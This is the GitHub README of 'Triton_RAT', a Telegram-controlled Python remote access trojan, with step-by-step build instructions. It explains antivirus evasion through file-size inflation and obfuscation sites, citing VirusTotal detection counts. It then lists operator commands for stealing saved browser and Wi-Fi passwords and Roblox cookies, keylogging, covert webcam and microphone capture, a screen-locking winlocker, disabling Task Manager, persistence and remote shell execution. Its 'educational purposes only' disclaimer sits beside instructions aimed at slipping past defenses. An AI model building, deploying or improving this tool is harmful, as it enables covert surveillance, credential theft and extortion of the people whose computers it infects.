Skip to content

๐ŸฆŽTriton_RAT is free and easy to use, one of the best remote administration tools written in Python, fully integrated with Telegram๐ŸฆŽ

License

Notifications You must be signed in to change notification settings

WhiteeRabbit/Triton_RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

51 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

Triton_RAT

Triton_Remote_Administration_Tool

TRITON

Hi ๐Ÿ‘‹, I'm WhiteeRabbit

I wrote RAT in python that works with telegram!

The best rat that works with telegram!

This tool was created for educational purporses only! I'm not responding for your action!

๐ŸŽฏ About

With this tool you can control with YOUR pc remotly using telegram That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account You can also build exe with builder. Triton RAT GUI Builder: Triton_RAT-gui

Let's get started!:

Download python!

python

Bot Password (when you entering /help or /start) : acd

๐Ÿ Starting

# Register account in telegram
# Create bot with botfather


# Download this project
# In the old version of Rat we used a site for obfuscation and installed pyinstaller with github repo
# But antiviruses now detect it worse than installin pyinstaller via pip
# and Virustotal will show less detection than obfuscation
# But I wouldn't be me if i didn't find an obfuscation method
# There are still decetions , but at least we make fewer of them.

$ Download pyinstaller 5.13.0 or older versions: pip install pyinstaller==5.13.0
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that 

# also i'm recomending you to install and upgrade setuptools and pip
$ pip install --upgrade setuptools pip
# if you don't do this, problems may arise

# Download requiremets.txt
$ pip install -r requirements.txt

# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')

# !MAIN STEP! obfuscation will help to deceive antiviruses
$ For obfuscation we will use my python program which you can find at the link: https://github.com/WhiteeRabbit/fake_file_resizer
$ https://github.com/WhiteeRabbit/fake_file_resizer
$ You can also use websites for obfuscation, I wrote about it a little belowโฌ‡๏ธ
# We can increase the file size through this appalication so that antiviruses skip rat beacuse of size.
# For example if you write the size 620 mb , Antivirus Eset will skip that,and it will less detetct.
# Download fake_file_resizer, then run:
$ python fake_file_resizer.py
# Enter your exe, then enter output file name after that write output file size in mb(don't write mb).
# Without manipulations with fake_file_resizer (no obfuscated) it shows 11 detects in virustotal, but with my ip is shows only 4 detects
# Today this is the best method of obfuscation 
# If you want to obfuscate CODE that I'm recomending to you these 2 websites:
# First (6 detection):https://pyob.oxyry.com/ (use this after minifying the code ,because code's too long)
# Second (5 detection): https://python-minifier.com/
# These are the best method if you don't want to use fake_file_resizer
# Don't worry it detects by not popular antiviruses
# First, copy the full code of Triton_RAT_Release.py then paste it in second link
# After that, paste minified code in Triton_RAT_Release.py, then build it with pyinstallerโฌ‡๏ธ

# After downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import browser_cookie3 --hidden-import pyttsx3 --hidden-import pynput Triton_Rat_Release.py

# Some people says that you can decrease detections count with adding --key "testname" attribute when building it with pyinstaller
# But, it didn't worked for me...


# wait for building exe
# !BOT PASSWORD IS: acd

$ run exe and bot started! 


You can also build exe with gui builder:

Triton RAT GUI Builder: Triton_RAT-gui

Thanks to jayjayQy42

If you want to avoid scanning some antiviruses you can make thatโฌ‡๏ธ

More online scanners and antiviruses also most popular online antivirus scanner virustotal's max allowed file size is 650 MB. Antiviruses, seeing the file size that it is large, will stupidly not check it! and you will be cool man.

I wrote a python app that will help you to change your file's size for ex: from 100 mb to 750 mb.

With help of this app you can make your file's size as you wanted!(it works on all systems)

23

You can use:

**๐Ÿ› ๏ธ System Commands**
- โš™๏ธ **/start** - Start the program
- โš™๏ธ **/help** - Help with commands
- ๐Ÿ”Œ **/addstartup** - Add autostart
- ๐Ÿ“ **/filepath** - Shows the script's full path
- โŒจ๏ธ **/keylogger** - Start keylogger
- โ›” **/stopkeylogger** - Stop keylogger
- ๐Ÿ‘Ÿ **/run [filepath]** - Run file
- ๐Ÿง‘๐Ÿปโ€๐Ÿ’ป **/users** - Show users on the PC
- ๐Ÿ–ฅ๏ธ **/whoami** - Show the name of the PC
- ๐Ÿ“ƒ **/tasklist** - Show running tasks
- ๐Ÿงจ **/taskkill [task]** - Kill the entered task
- ๐Ÿ’ค **/sleep** - Put the PC to sleep
- ๐Ÿ•š **/shutdown** - Shutdown the PC
- ๐Ÿ”„ **/restart** - Restart the PC
- ๐Ÿ’ฅ **/altf4** - ALT + F4 (google it to find what it means)
- ๐Ÿ’ฃ **/cmdbomb** - Opens 10 CMD windows
- โ“‚๏ธ **/msg [type] [title] [text]** - Displays a messagebox
*/msg types(info; warning; error; question; default or 0)*
** for ex: /msg error testtitle testtext **

## **๐Ÿ”’ Security & Privacy**
- ๐Ÿ”‘ **/passwords** - Show saved passwords on the PC
- ๐Ÿช **/robloxcookie** - Show Roblox cookies
- ๐Ÿงฑ **/wallpaper** - Change the desktop wallpaper
- ๐Ÿชฆ **/disabletaskmgr** - Disable Task Manager
- ๐Ÿ“  **/enabletaskmgr** - Enable Task Manager
- โ˜ข๏ธ **/winblocker** - My own winlocker
- โ˜ฃ๏ธ **/winblocker2** - If winblocker doesn't work

## **๐Ÿ“ฑ Device Management**
- ๐Ÿ“ท **/screenshot** - Take a screenshot
- ๐ŸŽ™๏ธ **/mic [time in seconds]** - Record the PC's microphone
- ๐Ÿ“น **/webscreen** - Get a screenshot from the camera
- ๐ŸŽฆ **/webcam** - Get webcam video
- ๐ŸŽฅ **/screenrecord** - Record the screen
- ๐Ÿšซ **/block** - Block user input (mouse and keyboard)
- โœ… **/unblock** - Unblock user input (mouse and keyboard)
- ๐Ÿ–ฑ๏ธ **/mousemesstart** - Start mouse messing
- ๐Ÿ **/mousemesstop** - Stop mouse messing
- ๐Ÿชค **/mousekill** - Disable the mouse
- ๐Ÿญ **/mousestop** - Enable the mouse
- ๐Ÿ–ฑ๏ธ **/mousemove [x] [y]** - Enter x and y cordinates and mouse's pointer goes there
- ๐Ÿ **/mouseclick** - Make click with mouse
- ๐Ÿ”Š **/fullvolume** - Set volume to full
- ๐Ÿ”‰ **/volumeplus** - Increase volume by 10
- ๐Ÿ”‡ **/volumeminus** - Decrease volume by 10
- ๐Ÿ”„๏ธ **/rotate** - Rotate monitor +90 degrees (for exmpl: entering 2 times rotates it 180 degrees)
- ๐ŸชŸ **/maximize** - Maximize active window
- ๐ŸชŸ **/minimize** - Minimize active window

## **๐ŸŒ Networking**
- ๐Ÿ›œ **/wifilist** - Show saved Wi-Fi networks
- ๐Ÿ” **/wifipass [accesspoint]** - Show the password of a saved Wi-Fi network
- ๐ŸŒ **/chrome [website URL]** - Open a website in Chrome
- ๐ŸŒ **/edge [website URL]** - Open a website in Edge
- ๐ŸŒ **/firefox [website URL]** - Open a website in Firefox

## **๐ŸŽถ Multimedia**
- ๐Ÿ’ฌ๐Ÿ‘‚๐Ÿป **/textspech [your text]** - Speak the text aloud
- ๐ŸŽต **/playsound [file path]** - Play a sound file (first upload the file using **/upload**)
- ๐Ÿ“ **/download [file path]** - Download a file from the PC
- ๐Ÿ—ƒ๏ธ **/upload** - Upload a file to the PC
- ๐Ÿ“‹ **/clipboard** - Show clipboard content
- ๐Ÿ“‡ **/changeclipboard [testcahnge]** - Change clipboard content

## **โš™๏ธ Advanced Operations**
- ๐Ÿ—ก๏ธ **/e [command]** - Execute shell commands (shortcut)
- ๐Ÿน **/ex [command]** - Execute shell commands with long responses
- ๐Ÿ”ซ **/execute** - Execute shell commands my alternative of netcat in linux (works commands such as cd ,cd.. and etc...)
- *commands like cd ,cd .. and others work excellent in the /e ,  /ex and /execute commands.*
- ๐Ÿ“… **/metadata [filepath]** - Displays the file's metadata information
- โŒจ๏ธ **/keytype [key]** - Enter a text and that text will written with pc's keyboard
- โŒจ๏ธ **/keypress [key]** - Press a specific key on the keyboard
- โŒจ๏ธ **/keypresstwo [key1] [key2]** - Press two keys simultaneously
- โŒจ๏ธ **/keypressthree [key1] [key2] [key3]** - Press three keys simultaneously
- ๐Ÿ•ถ๏ธ **/hide** - Hide your app
- ๐Ÿ‘“ **/unhide** - Unhide your app

## **๐Ÿ–ฅ๏ธ System Information**
- ๐Ÿชช **/info** - Show PC information (IP, location, country, city)
- ๐Ÿ“Š **/pcinfo** - Info about PC's OS, system, CPU, Windows version, BIOS, etc...
- ๐Ÿ’ป **/shortinfo** - Show's less but, mostly the necessary information about pc
- ๐Ÿ› ๏ธ **/apps** - Show installed apps on the PC
- ๐Ÿ”‹ **/batteryinfo** - Show info about battery 

## **EXAMPLES:**
- ๐Ÿ“– **/examples** - Shows examples

## **๐Ÿ“ฑ๐Ÿคณ๐ŸปMy Socials:๐ŸŒ๐Ÿ“ฒ**
- ๐Ÿ”— **/github** - [**My github**]

Antivirus check (with help of fake_file_resizer)๐Ÿ™‚

ะกะฝะธะผะพะบ ัะบั€ะฐะฝะฐ (24)

Antivirus check (with help of second obfuscation(minifying) method (i wrote about thatโฌ†๏ธ))

ะกะฝะธะผะพะบ ัะบั€ะฐะฝะฐ (26)

๐Ÿ—๏ธ Triton_Rat_Gui Builder (Huge thanks to jayjayQy42):

This man created builder for Triton rat, don't forget support him also!

Triton_Rat V2 update features:

  • New interface and desing
  • Added more than 10 new functions(also keylogger,metadata ,pc info and etc...)
  • Added: minimaze ,maximize ,rotate monitor ,metadata ,keylogger, block/unblock user input ,better information about pc (from bios to battery) and etc... โ˜บ๏ธ
  • Fixed bugs

๐Ÿ“ License

This project is licensed under the MIT License. For more details, please refer to the LICENSE file.

๐Ÿ™๐Ÿป Thanks to everyone who supported this project with stars! Thank you all very much!